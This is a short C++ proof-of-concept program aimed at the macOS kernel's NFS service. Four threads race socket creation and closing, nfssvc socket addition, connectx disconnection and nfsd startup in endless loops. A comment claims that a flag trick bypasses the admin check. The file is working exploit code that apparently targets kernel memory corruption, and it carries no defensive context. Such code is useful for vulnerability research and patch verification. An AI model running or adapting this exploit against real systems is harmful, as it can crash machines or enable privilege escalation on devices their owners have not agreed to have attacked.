#include <thread>
#include <unistd.h>

#define __APPLE_API_PRIVATE
#include <nfs/nfs.h>
#undef __APPLE_API_PRIVATE

#include <netinet/ip.h>

volatile int sock = 0;
const struct sockaddr_in address = {
    .sin_family = AF_INET,
    .sin_port = 6565,
    .sin_addr = {1337},
};

const struct sa_endpoints endpoints = {
    .sae_srcif = 0,
    .sae_srcaddr = nullptr,
    .sae_srcaddrlen = 0,
    .sae_dstaddr = reinterpret_cast<const struct sockaddr*>(&address),
    .sae_dstaddrlen = sizeof(address),
};

void AddSocketToNfs() {
    while (1) {
        struct nfsd_args args = {
            .sock = sock,
            .name = 0,
            .namelen = 0,
        };
        int retval = nfssvc(NFSSVC_ADDSOCK | 2, reinterpret_cast<caddr_t>(&args));
        printf("nfssvc(NFSSVC_ADDSOCK) returned %d\n", retval);
    }
}

void DisconnectSocket() {
    while (1) {
        int retval = connectx(sock, &endpoints, 0, 0, nullptr, 0, nullptr, nullptr);
        printf("connectx returned %d\n", retval);
    }
}

void RunNfsd() {
    while (1) {
        // Using | 2 bypasses the admin check
        int retval = nfssvc(NFSSVC_NFSD | 2, nullptr);
        printf("nfssvc(NFSSVC_NFSD) returned %d\n", retval);
    }
}

void CreateAndCloseSocketLoop() {
    while (1) {
        sock = socket(AF_ROUTE, SOCK_RAW, IPPROTO_IP);
        printf("socket returned %d\n", sock);
        close(sock);
    }
}

int main() {
    std::thread thread1(CreateAndCloseSocketLoop);
    std::thread thread2(AddSocketToNfs);
    std::thread thread3(DisconnectSocket);
    std::thread thread4(RunNfsd);
    thread1.join();
    thread2.join();
    thread3.join();
    thread4.join();
    return 0;
}
